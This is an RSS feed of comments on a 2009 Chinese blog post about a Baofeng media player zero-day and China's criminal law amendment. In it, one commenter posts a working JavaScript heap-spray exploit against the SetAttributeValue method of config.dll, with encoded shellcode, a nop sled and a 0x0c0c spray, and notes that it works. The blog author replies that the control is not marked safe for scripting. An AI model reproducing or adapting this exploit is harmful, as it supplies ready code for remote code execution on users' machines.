评论:暴风影音0day和刑法修正案 http://baoz.net/baofeng0-0day-law/ 己所不欲勿劝他人 Fri, 12 Mar 2010 06:24:36 +0000 http://wordpress.org/?v=2.9.2 hourly 1 来自:baoz http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-436 baoz Thu, 07 May 2009 14:35:06 +0000 http://baoz.net/?p=2022#comment-436 指导不敢当,互相学习 :) 指导不敢当,互相学习 :)

]]> 来自:3erty http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-435 3erty Thu, 07 May 2009 07:48:12 +0000 http://baoz.net/?p=2022#comment-435 好,多谢指导 好,多谢指导

]]> 来自:baoz http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-433 baoz Thu, 07 May 2009 07:10:21 +0000 http://baoz.net/?p=2022#comment-433 你可以搜索一下 MSDN里有不少描述safe for script和safe for init的的资料。 你可以搜索一下 MSDN里有不少描述safe for script和safe for init的的资料。

]]> 来自:3erty http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-432 3erty Thu, 07 May 2009 05:58:36 +0000 http://baoz.net/?p=2022#comment-432 对,的确有这个问题 不是很了解safeforscript,可否提供些资料0_0 对,的确有这个问题
不是很了解safeforscript,可否提供些资料0_0

]]> 来自:baoz http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-430 baoz Thu, 07 May 2009 01:34:37 +0000 http://baoz.net/?p=2022#comment-430 你用ie默认的安全级别,把这个js放到外面的服务器上,访问一下,看看会发生什么 :) 应该会js报错,然后告诉你xxxx方法不可用。 你用ie默认的安全级别,把这个js放到外面的服务器上,访问一下,看看会发生什么 :)
应该会js报错,然后告诉你xxxx方法不可用。

]]> 来自:3erty http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-427 3erty Thu, 07 May 2009 00:30:02 +0000 http://baoz.net/?p=2022#comment-427 function test() { var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<300; x++) memory[x] = block + shellcode; var arg2 = ''; while (arg2.length <264) arg2+=unescape("%u0c0c"); var arg1="3rty88"; var arg3="3rty88" target.SetAttributeValue(arg1,arg2,arg3); } 可用:) function test()
{
var shellcode = unescape(“%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063″);
var bigblock = unescape(“%u9090%u9090″);
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0×40000)
block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
var arg2 = ”;
while (arg2.length <264)
arg2+=unescape(“%u0c0c”);
var arg1=”3rty88″;
var arg3=”3rty88″
target.SetAttributeValue(arg1,arg2,arg3);
}

可用:)

]]> 来自:baoz http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-423 baoz Wed, 06 May 2009 15:15:29 +0000 http://baoz.net/?p=2022#comment-423 config.dll的问题不大,safeforscript是false的 config.dll的问题不大,safeforscript是false的

]]> 来自:3erty http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-415 3erty Wed, 06 May 2009 07:14:59 +0000 http://baoz.net/?p=2022#comment-415 错了:)应该是 while (bstrAttributeName.length <264) bstrAttributeName+=unescape(”%u0c0c”); 错了:)应该是

while (bstrAttributeName.length <264)
bstrAttributeName+=unescape(”%u0c0c”);

]]> 来自:3erty http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-414 3erty Wed, 06 May 2009 06:49:02 +0000 http://baoz.net/?p=2022#comment-414 config.dll的漏洞仍然没补 SetAttributeValue ( ByVal lpQueryStr As String , ByVal bstrAttributeName As String , ByVal lpValueStr As String ) 第一个参数和第二个参数都有问题 while (bstrAttributeName.length <264) arg2+=unescape("%u0c0c"); config.dll的漏洞仍然没补
SetAttributeValue ( ByVal lpQueryStr As String , ByVal bstrAttributeName As String , ByVal lpValueStr As String )
第一个参数和第二个参数都有问题
while (bstrAttributeName.length <264)
arg2+=unescape(“%u0c0c”);

]]> 来自:ieraya http://baoz.net/baofeng0-0day-law/comment-page-1/#comment-408 ieraya Tue, 05 May 2009 23:10:07 +0000 http://baoz.net/?p=2022#comment-408 <a href="#comment-402" rel="nofollow">@void</a>估计很多人都该毙掉了 @void估计很多人都该毙掉了

]]>